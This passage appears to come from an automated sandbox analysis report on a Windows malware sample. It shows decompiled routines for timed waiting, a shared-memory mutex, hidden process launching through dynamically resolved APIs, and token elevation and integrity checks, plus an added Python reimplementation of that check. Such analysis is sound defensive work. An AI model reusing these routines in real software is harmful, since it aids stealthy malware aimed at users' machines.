                            								 *_t93(_a4, _v20);
                            								_t94 = __imp__;
                            								 *_t94(_v4, _v32);
                            								 *_t94(_v12, _t97);
                            								_t71 = E00F13B55(0xffffffffffffffff, _v20, _v28, _v24); // executed
                            								_v52 = _t71;
                            								if(_t71 != 0 && _t71 != 0x10d2) {
                            									E00F155F1();
                            								}
                            								RtlFreeHeap( *0xf1d270, 0, _v48); // executed
                            								_t92 = 0;
                            							}
                            							HeapFree( *0xf1d270, _t92, _t97);
                            						}
                            						RtlFreeHeap( *0xf1d270, _t92, _a16); // executed
                            					}
                            					HeapFree( *0xf1d270, _t92, _v0);
                            				}
                            				RtlFreeHeap( *0xf1d270, _t92, _t83); // executed
                            				return _a4;
                            			}
                            0x00f16367
                            0x00f16367
                            0x00f16367
                            0x00f16367
                            0x00f1636d
                            0x00f16374
                            0x00f1637c
                            0x00f1637e
                            0x00f1637e
                            0x00f1638b
                            0x00f16396
                            0x00f16399
                            0x00f163a4
                            0x00f163a7
                            0x00f163ac
                            0x00f163af
                            0x00f163b4
                            0x00f163b7
                            0x00f163d0
                            0x00f163d2
                            0x00f163d8
                            0x00f163e8
                            0x00f163ea
                            0x00f163ed
                            0x00f163ef
                            0x00f163fc
                            0x00f16400
                            0x00f16403
                            0x00f16413
                            0x00f16415
                            0x00f1641c
                            0x00f16426
                            0x00f16426
                            0x00f16428
                            0x00f1642f
                            0x00f16433
                            0x00f16436
                            0x00f16445
                            0x00f16456
                            0x00f16456
                            0x00f16458
                            0x00f16466
                            0x00f1646b
                            0x00f1646f
                            0x00f16473
                            0x00f16485
                            0x00f1648d
                            0x00f16491
                            0x00f1649d
                            0x00f164a2
                            0x00f164ab
                            0x00f164bc
                            0x00f164c0
                            0x00f164c9
                            0x00f164cf
                            0x00f164d7
                            0x00f164dc
                            0x00f164e9
                            0x00f164ef
                            0x00f164fb
                            0x00f16501
                            0x00f16502
                            0x00f16509
                            0x00f1650d
                            0x00f16513
                            0x00f1651a
                            0x00f16524
                            0x00f1652a
                            0x00f16534
                            0x00f1653b
                            0x00f16549
                            0x00f16550
                            0x00f16554
                            0x00f1655d
                            0x00f1655d
                            0x00f1656e
                            0x00f16570
                            0x00f16570
                            0x00f1657a
                            0x00f1657a
                            0x00f16587
                            0x00f16587
                            0x00f16594
                            0x00f16594
                            0x00f1659e
                            0x00f165ab

                            APIs
                            • GetTickCount.KERNEL32 ref: 00F1637E
                              • Part of subcall function 00F1A7FB: lstrlen.KERNEL32(00000000,?,00000000,00000000,?,?,75145520,00F164DC,?,057F95B0), ref: 00F1A826
                              • Part of subcall function 00F1A7FB: lstrlen.KERNEL32(?,?,75145520,00F164DC,?,057F95B0), ref: 00F1A82E
                              • Part of subcall function 00F1A7FB: strcpy.NTDLL ref: 00F1A845
                              • Part of subcall function 00F1A7FB: lstrcat.KERNEL32(00000000,?), ref: 00F1A850
                              • Part of subcall function 00F1A7FB: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,00F164DC,?,75145520,00F164DC,?,057F95B0), ref: 00F1A86D
                            • wsprintfA.USER32 ref: 00F163CB
                            • wsprintfA.USER32 ref: 00F163E8
                            • wsprintfA.USER32 ref: 00F16413
                            • HeapFree.KERNEL32(00000000,?), ref: 00F16426
                            • wsprintfA.USER32 ref: 00F16445
                            • HeapFree.KERNEL32(00000000,?), ref: 00F16456
                            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00F16485
                            • GetTickCount.KERNEL32 ref: 00F16497
                            • RtlEnterCriticalSection.NTDLL(057F9570), ref: 00F164AB
                            • RtlLeaveCriticalSection.NTDLL(057F9570), ref: 00F164C9
                            • StrTrimA.SHLWAPI(00000000,00F1C2AC,?,057F95B0), ref: 00F164FB
                              • Part of subcall function 00F16F6D: lstrlen.KERNEL32(057F9B58,00000000,00000000,?,00F16507,00000000), ref: 00F16F7D
                              • Part of subcall function 00F16F6D: lstrlen.KERNEL32(?), ref: 00F16F85
                              • Part of subcall function 00F16F6D: lstrcpy.KERNEL32(00000000,057F9B58), ref: 00F16F99
                              • Part of subcall function 00F16F6D: lstrcat.KERNEL32(00000000,?), ref: 00F16FA4
                            • lstrcpy.KERNEL32(00000000,?), ref: 00F1651A
                            • lstrcpy.KERNEL32(?,?), ref: 00F16524
                            • lstrcat.KERNEL32(?,?), ref: 00F16534
                            • lstrcat.KERNEL32(?,00000000), ref: 00F1653B
                            • RtlFreeHeap.NTDLL(00000000,?,?,?,?), ref: 00F1656E
                            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00F1657A
                            • RtlFreeHeap.NTDLL(00000000,?,?,057F95B0), ref: 00F16587
                            • HeapFree.KERNEL32(00000000,?), ref: 00F16594
                            • RtlFreeHeap.NTDLL(00000000,?), ref: 00F1659E
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: Heap$Free$lstrcatlstrlenwsprintf$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeavestrcpy
                            • String ID:
                            • API String ID: 1384543093-0
                            • Opcode ID: e28fb58f8b94f6b38b13a4f2102206cee4903abe488ae2a992d119628fa9ede8
                            • Instruction ID: b0681de2d9337ca9ccfa5b84681ac6543add1dfa5460d21e06e7bf7513e655ce
                            • Opcode Fuzzy Hash: e28fb58f8b94f6b38b13a4f2102206cee4903abe488ae2a992d119628fa9ede8
                            • Instruction Fuzzy Hash: 2D51DA71500248AFCB11AB69EC05EEA7BF9FF88354F0A8528F458D2231CB35D945EF62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 83%
                            			E00F15038(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                            				void _v48;
                            				long _v52;
                            				struct %anon52 _v60;
                            				char _v72;
                            				long _v76;
                            				void* _v80;
                            				union _LARGE_INTEGER _v84;
                            				struct %anon52 _v92;
                            				void* _v96;
                            				void* _v100;
                            				union _LARGE_INTEGER _v104;
                            				long _v108;
                            				intOrPtr _v120;
                            				struct %anon52 _v128;
                            				struct %anon52 _t46;
                            				void* _t51;
                            				long _t53;
                            				void* _t54;
                            				struct %anon52 _t60;
                            				long _t64;
                            				struct %anon52 _t65;
                            				intOrPtr _t67;
                            				void* _t68;
                            				void* _t72;
                            				signed int _t73;
                            				void* _t75;
                            				void* _t78;
                            				void** _t82;
                            				signed int _t86;
                            				void* _t89;
                            
                            				_t75 = __edx;
                            				_v52 = 0;
                            				memset( &_v48, 0, 0x2c);
                            				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
                            				_t46 = CreateWaitableTimerA(0, 1, 0);
                            				_v60 = _t46;
                            				if(_t46 == 0) {
                            					_v92.HighPart = GetLastError();
                            				} else {
                            					_push(0xffffffff);
                            					_push(0xff676980);
                            					_push(0);
                            					_push( *0xf1d278);
                            					_v76 = 0;
                            					_v80 = 0;
                            					L00F1B030();
                            					_v84.LowPart = _t46;
                            					_v80 = _t75;
                            					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
                            					_t51 =  *0xf1d2a4; // 0x2e8
                            					_v76 = _t51;
                            					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
                            					_v108 = _t53;
                            					if(_t53 == 0) {
                            						if(_a8 != 0) {
                            							L4:
                            							 *0xf1d284 = 5;
                            						} else {
                            							_t68 = E00F14C56(_t75); // executed
                            							if(_t68 != 0) {
                            								goto L4;
                            							}
                            						}
                            						_v104.LowPart = 0;
                            						L6:
                            						L6:
                            						if(_v104.LowPart == 1 && ( *0xf1d298 & 0x00000001) == 0) {
                            							_v104.LowPart = 2;
                            						}
                            						_t73 = _v104.LowPart;
                            						_t58 = _t73 << 4;
                            						_t78 = _t89 + (_t73 << 4) + 0x3c;
                            						_t74 = _t73 + 1;
                            						_v92.LowPart = _t73 + 1;
                            						_t60 = E00F15B5B(_t74, _t78, _t74, _t89 + _t58 + 0x3c, _t78,  &_v96,  &_v100); // executed
                            						_v128.LowPart = _t60;
                            						if(_t60 != 0) {
                            							goto L17;
                            						}
                            						_t65 = _v92;
                            						_t97 = _t65 - 3;
                            						_v104.LowPart = _t65;
                            						if(_t65 != 3) {
                            							goto L6;
                            						} else {
                            							_t67 = E00F16006(_t74, _t97,  &_v72, _a4, _a8); // executed
                            							_v120 = _t67;
                            						}
                            						goto L12;
                            						L17:
                            						__eflags = _t60 - 0x10d2;
                            						if(_t60 != 0x10d2) {
                            							_push(0xffffffff);
                            							_push(0xff676980);
                            							_push(0);
                            							_push( *0xf1d27c);
                            							goto L21;
                            						} else {
                            							__eflags =  *0xf1d280; // 0x0
                            							if(__eflags == 0) {
                            								goto L12;
                            							} else {
                            								_t60 = E00F155F1();
                            								_push(0xffffffff);
                            								_push(0xdc3cba00);
                            								_push(0);
                            								_push( *0xf1d280);
                            								L21:
                            								L00F1B030();
                            								_v104.LowPart = _t60;
                            								_v100 = _t78;
                            								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
                            								_t64 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
                            								__eflags = _t64;
                            								_v128 = _t64;
                            								if(_t64 == 0) {
                            									goto L6;
                            								} else {
                            									goto L12;
                            								}
                            							}
                            						}
                            						L25:
                            					}
                            					L12:
                            					_t82 =  &_v72;
                            					_t72 = 3;
                            					do {
                            						_t54 =  *_t82;
                            						if(_t54 != 0) {
                            							RtlFreeHeap( *0xf1d270, 0, _t54); // executed
                            						}
                            						_t82 =  &(_t82[4]);
                            						_t72 = _t72 - 1;
                            					} while (_t72 != 0);
                            					CloseHandle(_v80);
                            				}
                            				return _v92.HighPart;
                            				goto L25;
                            			}

                            APIs
                            • memset.NTDLL ref: 00F15052
                            • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 00F1505E
                            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 00F15086
                            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 00F150A6
                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,00F15A39,?), ref: 00F150C1
                            • RtlFreeHeap.NTDLL(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00F15A39,?,00000000), ref: 00F15169
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00F15A39,?,00000000,?,?), ref: 00F15179
                            • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 00F151B3
                            • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?,?), ref: 00F151CD
                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00F151D9
                              • Part of subcall function 00F14C56: StrToIntExW.SHLWAPI(?,00000000,?,?,?,057F93B8,00000000,?,7519F710,00000000,7519F730), ref: 00F14CA5
                              • Part of subcall function 00F14C56: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,?,057F93F0,?,00000000,?,00000014,?,057F93AC), ref: 00F14D42
                              • Part of subcall function 00F14C56: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00F150D9), ref: 00F14D54
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00F15A39,?,00000000,?,?), ref: 00F151EC
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                            • String ID:
                            • API String ID: 3521023985-0
                            • Opcode ID: aa12d4de0102dbaf1f64b0eb2c56452a9cb17080ba2450676c48bfe746185877
                            • Instruction ID: a7602178f0e427e1b0b102430d3cf20436e5454355bcf3eb2141acc2fa4a0b20
                            • Opcode Fuzzy Hash: aa12d4de0102dbaf1f64b0eb2c56452a9cb17080ba2450676c48bfe746185877
                            • Instruction Fuzzy Hash: 3A516A71409325FFD7119F159C44ADBBBE8EB89764F108A1AF464D21A0D770C944EFA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 70%
                            			E00F15C7F(intOrPtr __edx, void** _a4, void** _a8) {
                            				intOrPtr _v8;
                            				struct _FILETIME* _v12;
                            				short _v56;
                            				struct _FILETIME* _t12;
                            				intOrPtr _t13;
                            				void* _t17;
                            				void* _t21;
                            				intOrPtr _t27;
                            				long _t28;
                            				void* _t30;
                            
                            				_t27 = __edx;
                            				_t12 =  &_v12;
                            				GetSystemTimeAsFileTime(_t12);
                            				_push(0x192);
                            				_push(0x54d38000);
                            				_push(_v8);
                            				_push(_v12);
                            				L00F1B02A();
                            				_push(_t12);
                            				_v12 = _t12;
                            				_t13 =  *0xf1d2b8; // 0x48da5a8
                            				_t5 = _t13 + 0xf1e876; // 0x57f8e1e
                            				_push(_t13 + 0xf1e59c);
                            				_push(0x16);
                            				_push( &_v56);
                            				_v8 = _t27;
                            				L00F1AD4A();
                            				_t17 = CreateFileMappingW(0xffffffff, 0xf1d2e4, 4, 0, 0x1000,  &_v56); // executed
                            				_t30 = _t17;
                            				if(_t30 == 0) {
                            					_t28 = GetLastError();
                            				} else {
                            					if(GetLastError() == 0xb7) {
                            						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed
                            						if(_t21 == 0) {
                            							_t28 = GetLastError();
                            							if(_t28 != 0) {
                            								goto L6;
                            							}
                            						} else {
                            							 *_a4 = _t30;
                            							 *_a8 = _t21;
                            							_t28 = 0;
                            						}
                            					} else {
                            						_t28 = 2;
                            						L6:
                            						CloseHandle(_t30);
                            					}
                            				}
                            				return _t28;
                            			}

                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,00F1590B,?,?,?,?,?), ref: 00F15C8B
                            • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00F15CA1
                            • _snwprintf.NTDLL ref: 00F15CC6
                            • CreateFileMappingW.KERNELBASE(000000FF,00F1D2E4,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 00F15CE2
                            • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,00F1590B,?,?,?,?), ref: 00F15CF4
                            • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00F15D0B
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,00F1590B,?,?,?), ref: 00F15D2C
                            • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,00F1590B,?,?,?,?), ref: 00F15D34
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                            • String ID:
                            • API String ID: 1814172918-0
                            • Opcode ID: 76f027978750d210ffb5f04958925bc4a547577f96972135c3af0045a6278fee
                            • Instruction ID: d8c18eb3875333f6021f89416857a52be02aa63a3b89b772436ef2a4f543c3a5
                            • Opcode Fuzzy Hash: 76f027978750d210ffb5f04958925bc4a547577f96972135c3af0045a6278fee
                            • Instruction Fuzzy Hash: 5C21EB72941608FBD711DB64DC09FDD77B9AF88B10F218125F505E71E0D770D945AB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 72%
                            			E00F187A1(void* __eax, void* __ecx) {
                            				long _v8;
                            				char _v12;
                            				void* _v16;
                            				void* _v28;
                            				long _v32;
                            				void _v104;
                            				char _v108;
                            				long _t36;
                            				intOrPtr _t40;
                            				intOrPtr _t47;
                            				intOrPtr _t50;
                            				void* _t58;
                            				void* _t68;
                            				intOrPtr* _t70;
                            				intOrPtr* _t71;
                            
                            				_t1 = __eax + 0x14; // 0x74183966
                            				_t69 =  *_t1;
                            				_t36 = E00F16CE5(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16); // executed
                            				_v8 = _t36;
                            				if(_t36 != 0) {
                            					L12:
                            					return _v8;
                            				}
                            				E00F1AA99( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                            				_t40 = _v12(_v12);
                            				_v8 = _t40;
                            				if(_t40 == 0 && ( *0xf1d298 & 0x00000001) != 0) {
                            					_v32 = 0;
                            					asm("stosd");
                            					asm("stosd");
                            					asm("stosd");
                            					_v108 = 0;
                            					memset( &_v104, 0, 0x40);
                            					_t47 =  *0xf1d2b8; // 0x48da5a8
                            					_t68 = E00F170F1(_t47 + 0xf1e3b3);
                            					if(_t68 == 0) {
                            						_v8 = 8;
                            					} else {
                            						_t50 =  *0xf1d2b8; // 0x48da5a8
                            						_t19 = _t50 + 0xf1e760; // 0x57f8d08
                            						_t71 = GetProcAddress(GetModuleHandleA(_t50 + 0xf1e0af), _t19);
                            						if(_t71 == 0) {
                            							_v8 = 0x7f;
                            						} else {
                            							_v108 = 0x44;
                            							E00F12522();
                            							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0); // executed
                            							_push(1);
                            							E00F12522();
                            							if(_t58 == 0) {
                            								_v8 = GetLastError();
                            							} else {
                            								CloseHandle(_v28);
                            								CloseHandle(_v32);
                            							}
                            						}
                            						HeapFree( *0xf1d270, 0, _t68);
                            					}
                            				}
                            				_t70 = _v16;
                            				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                            				E00F16DFA(_t70);
                            				goto L12;
			}

                            Instruction addresses of the listing above: 0x00f187a9 to 0x00f188d8 (the per-line address column did not survive extraction).

                            APIs
                              • Part of subcall function 00F16CE5: GetModuleHandleA.KERNEL32(?,00000020,?,74183966,00000000,?,?,?,00F187BD,?,?,?,?,00000000,00000000), ref: 00F16D0A
                              • Part of subcall function 00F16CE5: GetProcAddress.KERNEL32(00000000,?), ref: 00F16D2C
                              • Part of subcall function 00F16CE5: GetProcAddress.KERNEL32(00000000,?), ref: 00F16D42
                              • Part of subcall function 00F16CE5: GetProcAddress.KERNEL32(00000000,?), ref: 00F16D58
                              • Part of subcall function 00F16CE5: GetProcAddress.KERNEL32(00000000,?), ref: 00F16D6E
                              • Part of subcall function 00F16CE5: GetProcAddress.KERNEL32(00000000,?), ref: 00F16D84
                            • memset.NTDLL ref: 00F1880B
                              • Part of subcall function 00F170F1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,00F18824,?), ref: 00F17102
                              • Part of subcall function 00F170F1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 00F1711C
                            • GetModuleHandleA.KERNEL32(?,057F8D08,?), ref: 00F18841
                            • GetProcAddress.KERNEL32(00000000), ref: 00F18848
                            • HeapFree.KERNEL32(00000000,00000000), ref: 00F188B0
                              • Part of subcall function 00F12522: GetProcAddress.KERNEL32(?,00F16342), ref: 00F1253D
                            • CloseHandle.KERNEL32(00000000,00000001), ref: 00F1888D
                            • CloseHandle.KERNEL32(?), ref: 00F18892
                            • GetLastError.KERNEL32(00000001), ref: 00F18896
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                            • String ID:
                            • API String ID: 3075724336-0
                            • Opcode ID: 14a7e5e99b9da7958fba8ae051eb5ea690dcd20dddcc06ded31b1e9bb1abcc2b
                            • Instruction ID: 17de7c63eec3e518ff50d0749ad136d7c280d75219152d8ca16a1ad87a82e553
                            • Opcode Fuzzy Hash: 14a7e5e99b9da7958fba8ae051eb5ea690dcd20dddcc06ded31b1e9bb1abcc2b
                            • Instruction Fuzzy Hash: 0C317EB6C00208EFDB10AFA4CD84DDEBBB8EB08354F154465E506E3161D7759E85EBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00F14DCF(long* _a4) {
                            				long _v8;
                            				void* _v12;
                            				void _v16;
                            				long _v20;
                            				int _t33;
                            				void* _t46;
                            
                            				_v16 = 1;
                            				_v20 = 0x2000;
                            				if( *0xf1d294 > 5) {
                            					_v16 = 0;
                            					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                            						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                            						_v8 = 0;
                            						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                            						if(_v8 != 0) {
                            							_t46 = E00F155DC(_v8);
                            							if(_t46 != 0) {
                            								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                            								if(_t33 != 0) {
                            									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                            								}
                            								E00F16DFA(_t46);
                            							}
                            						}
                            						CloseHandle(_v12);
                            					}
                            				}
                            				 *_a4 = _v20;
                            				return _v16;
			}

                            Instruction addresses of the listing above: 0x00f14ddc to 0x00f14e95 (the per-line address column did not survive extraction).

                            APIs
                            • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00F14E01
                            • GetTokenInformation.KERNELBASE(00000000,00000014(TokenElevation),00000001,00000004,?,00000000), ref: 00F14E21
                            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00F14E31
                            • CloseHandle.KERNEL32(00000000), ref: 00F14E81
                              • Part of subcall function 00F155DC: RtlAllocateHeap.NTDLL(00000000,00000000,00F1552C), ref: 00F155E8
                            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 00F14E54
                            • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00F14E5C
                            • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00F14E6C
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp
                            Similarity
                            • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                            • String ID:
                            • API String ID: 1295030180-0
                            • Opcode ID: 3939105fe12e6adec501af651ebef2a30317710a645b4c8c03c3ea608d703c18
                            • Instruction ID: 8e33ab6ae4c6d7df8833acb2542c5615dcfa3332fb3ffd9b1a148b765c40b305
                            • Opcode Fuzzy Hash: 3939105fe12e6adec501af651ebef2a30317710a645b4c8c03c3ea608d703c18
                            • Instruction Fuzzy Hash: A4213975D0021DFFEB009FA4DC44EEEBBB9FB48314F1040A5E911A6161C7719A45EB60
                            Uniqueness

                            Uniqueness Score: -1.00%
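The function E00F14DCF above asks the process token two things: whether it is elevated (GetTokenInformation class 0x14, TokenElevation, written to _v16) and which integrity level it runs at (class 0x19, TokenIntegrityLevel), and from the second answer it keeps only the last sub-authority of the mandatory-label SID, which is the integrity RID. Its fallbacks are elevated = 1 and RID 0x2000, the Medium level. The Python below is an added example written for this report, not code from the sample or from Joe Sandbox: it reproduces that check, decoding constructed SID bytes offline and, on a Windows host, running the same OpenProcessToken / GetTokenInformation calls through ctypes. Reading the global compared against 5 as a cached OS major version is an assumption of the example.

```python
"""Added example; not code from the Joe Sandbox report or from the sample.

Reproduces what E00F14DCF learns about its host: the TOKEN_ELEVATION flag
(class 0x14) and the integrity RID taken from the last sub-authority of the
token's mandatory-label SID (class 0x19).  SID bytes used for testing are
constructed here; query_live_token() runs the real calls on Windows only.
"""
import struct
import sys
from typing import Optional, Tuple

TOKEN_ELEVATION = 0x14        # TOKEN_INFORMATION_CLASS value 20
TOKEN_INTEGRITY_LEVEL = 0x19  # TOKEN_INFORMATION_CLASS value 25
TOKEN_READ = 0x20008          # access mask passed to OpenProcessToken in the listing
SECURITY_MANDATORY_MEDIUM_RID = 0x2000  # the default the listing stores in _v20

# winnt.h SECURITY_MANDATORY_*_RID values, for naming the RID.
MANDATORY_RIDS = {0x0000: "Untrusted", 0x1000: "Low", 0x2000: "Medium",
                  0x2100: "Medium Plus", 0x3000: "High", 0x4000: "System",
                  0x5000: "Protected Process"}


def last_subauthority(sid: bytes) -> int:
    """Same value as GetSidSubAuthority(sid, GetSidSubAuthorityCount(sid) - 1).

    Raw SID layout: Revision (1 byte), SubAuthorityCount (1 byte),
    IdentifierAuthority (6 bytes, big-endian), then SubAuthorityCount
    little-endian DWORDs.
    """
    if len(sid) < 8:
        raise ValueError("SID shorter than its fixed header")
    revision, count = sid[0], sid[1]
    if revision != 1 or count == 0 or len(sid) < 8 + 4 * count:
        raise ValueError("malformed SID")
    (rid,) = struct.unpack_from("<I", sid, 8 + 4 * (count - 1))
    return rid


def build_label_sid(rid: int) -> bytes:
    """Construct S-1-16-<rid>; authority 16 is SECURITY_MANDATORY_LABEL_AUTHORITY."""
    return bytes([1, 1]) + (16).to_bytes(6, "big") + struct.pack("<I", rid)


def classify(os_major: int, elevated: int, label_sid: Optional[bytes]) -> Tuple[int, int]:
    """Return (is_elevated, integrity_rid) the way E00F14DCF does.

    The listing only touches the token when a cached value exceeds 5; this
    example assumes that value is the OS major version (both token classes
    exist only from Vista, major 6, onward).  Below that it reports
    elevated = 1 and Medium without asking the token at all.
    """
    if os_major <= 5:
        return 1, SECURITY_MANDATORY_MEDIUM_RID
    rid = SECURITY_MANDATORY_MEDIUM_RID
    if label_sid is not None:
        rid = last_subauthority(label_sid)
    return (1 if elevated else 0), rid


def integrity_name(rid: int) -> str:
    return MANDATORY_RIDS.get(rid, "RID 0x%x" % rid)


def query_live_token() -> Tuple[int, int]:
    """Windows only: OpenProcessToken plus the two GetTokenInformation calls via ctypes."""
    if sys.platform != "win32":
        raise OSError("query_live_token() needs a Windows host")
    import ctypes
    from ctypes import wintypes
    advapi32 = ctypes.WinDLL("advapi32", use_last_error=True)
    kernel32 = ctypes.WinDLL("kernel32", use_last_error=True)
    kernel32.GetCurrentProcess.restype = wintypes.HANDLE
    kernel32.CloseHandle.argtypes = [wintypes.HANDLE]
    advapi32.OpenProcessToken.argtypes = [wintypes.HANDLE, wintypes.DWORD, ctypes.POINTER(wintypes.HANDLE)]
    advapi32.GetTokenInformation.argtypes = [wintypes.HANDLE, ctypes.c_int, ctypes.c_void_p,
                                             wintypes.DWORD, ctypes.POINTER(wintypes.DWORD)]
    token = wintypes.HANDLE()
    if not advapi32.OpenProcessToken(kernel32.GetCurrentProcess(), TOKEN_READ, ctypes.byref(token)):
        raise ctypes.WinError(ctypes.get_last_error())
    try:
        elev, needed = wintypes.DWORD(0), wintypes.DWORD(0)
        advapi32.GetTokenInformation(token, TOKEN_ELEVATION, ctypes.byref(elev), 4, ctypes.byref(needed))
        advapi32.GetTokenInformation(token, TOKEN_INTEGRITY_LEVEL, None, 0, ctypes.byref(needed))
        buf = ctypes.create_string_buffer(needed.value)
        if not advapi32.GetTokenInformation(token, TOKEN_INTEGRITY_LEVEL, buf, needed.value, ctypes.byref(needed)):
            raise ctypes.WinError(ctypes.get_last_error())
        # TOKEN_MANDATORY_LABEL begins with a SID_AND_ATTRIBUTES: first field is a pointer to the SID.
        sid_ptr = ctypes.cast(buf, ctypes.POINTER(ctypes.c_void_p))[0]
        count = ctypes.string_at(sid_ptr, 2)[1]
        sid = ctypes.string_at(sid_ptr, 8 + 4 * count)
        return classify(6, elev.value, sid)
    finally:
        kernel32.CloseHandle(token)


if __name__ == "__main__":
    flag, rid = query_live_token()
    print("elevated=%d integrity=%s" % (flag, integrity_name(rid)))
```

Run the file on a Windows host to see the verdict the sample would reach for the current process; the pure functions (last_subauthority, classify, integrity_name) work anywhere and are what the offline checks exercise.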

                            APIs
                              • Part of subcall function 00F14176: IUnknown_QueryService.SHLWAPI(00000000,?,057F89D4,00F16FE2,?,?,?,?,?,?,?,?,?,?,?,00F16FE2), ref: 00F14242
                              • Part of subcall function 00F15F72: IUnknown_QueryInterface_Proxy.RPCRT4(?,?,?), ref: 00F15FAF
